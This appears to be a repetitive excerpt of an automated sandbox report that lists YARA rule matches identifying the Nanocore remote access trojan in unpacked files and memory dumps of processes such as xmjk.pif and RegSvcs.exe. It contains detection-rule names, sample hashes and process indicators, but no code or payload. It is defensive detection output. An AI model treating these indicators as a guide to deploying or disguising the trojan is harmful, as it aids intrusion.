        Source: 27.3.xmjk.pif.3e5c088.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 27.3.xmjk.pif.3e5c088.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 27.3.xmjk.pif.3e5c088.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 27.3.xmjk.pif.3e5c088.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 27.3.xmjk.pif.3e5c088.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 27.3.xmjk.pif.3e5c088.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 27.3.xmjk.pif.3e5c088.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 27.3.xmjk.pif.3e5c088.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 27.3.xmjk.pif.3e5c088.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 27.3.xmjk.pif.3df3078.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 27.3.xmjk.pif.3df3078.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 27.3.xmjk.pif.3df3078.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.3.xmjk.pif.4465058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.3.xmjk.pif.4465058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.xmjk.pif.4465058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.RegSvcs.exe.2f1c614.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.2f1c614.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4d3c088.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.3.xmjk.pif.4d3c088.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4d3c088.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.RegSvcs.exe.5900000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.5900000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4d3c088.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.3.xmjk.pif.4d3c088.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4d3c088.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.RegSvcs.exe.2f177b4.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.2f177b4.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 25.2.RegSvcs.exe.bc0000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.RegSvcs.exe.bc0000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 25.2.RegSvcs.exe.bc0000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 20.3.xmjk.pif.4c35448.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.3.xmjk.pif.4c35448.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4c35448.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.RegSvcs.exe.3f307ce.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.3f307ce.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.RegSvcs.exe.3f307ce.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.3.xmjk.pif.44ce068.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.3.xmjk.pif.44ce068.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.xmjk.pif.44ce068.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 27.3.xmjk.pif.3dbe458.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 27.3.xmjk.pif.3dbe458.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 27.3.xmjk.pif.3dbe458.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 27.3.xmjk.pif.3d89c50.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 27.3.xmjk.pif.3d89c50.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 27.3.xmjk.pif.3d89c50.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 25.2.RegSvcs.exe.44c07ce.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.RegSvcs.exe.44c07ce.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 25.2.RegSvcs.exe.44c07ce.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.350179976.000000000449A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.350179976.000000000449A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.350063292.0000000004431000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.350063292.0000000004431000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.411798480.0000000003E28000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.411798480.0000000003E28000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.412888978.0000000003E28000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.412888978.0000000003E28000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.394776495.0000000004C6A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.394776495.0000000004C6A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.352276623.00000000044CE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.352276623.00000000044CE000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.411513032.0000000003D56000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.411513032.0000000003D56000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.394077058.0000000003EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.394077058.0000000003EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.395083059.0000000004C36000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.395083059.0000000004C36000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.411892507.0000000003E5C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.411892507.0000000003E5C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.414829262.0000000003D56000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.414829262.0000000003D56000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.352230581.00000000044CE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.352230581.00000000044CE000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.411602320.0000000003DBF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.411602320.0000000003DBF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.392253067.0000000004CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.392253067.0000000004CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.412949182.00000000005A6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.412949182.00000000005A6000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.414560875.0000000003DF3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.414560875.0000000003DF3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
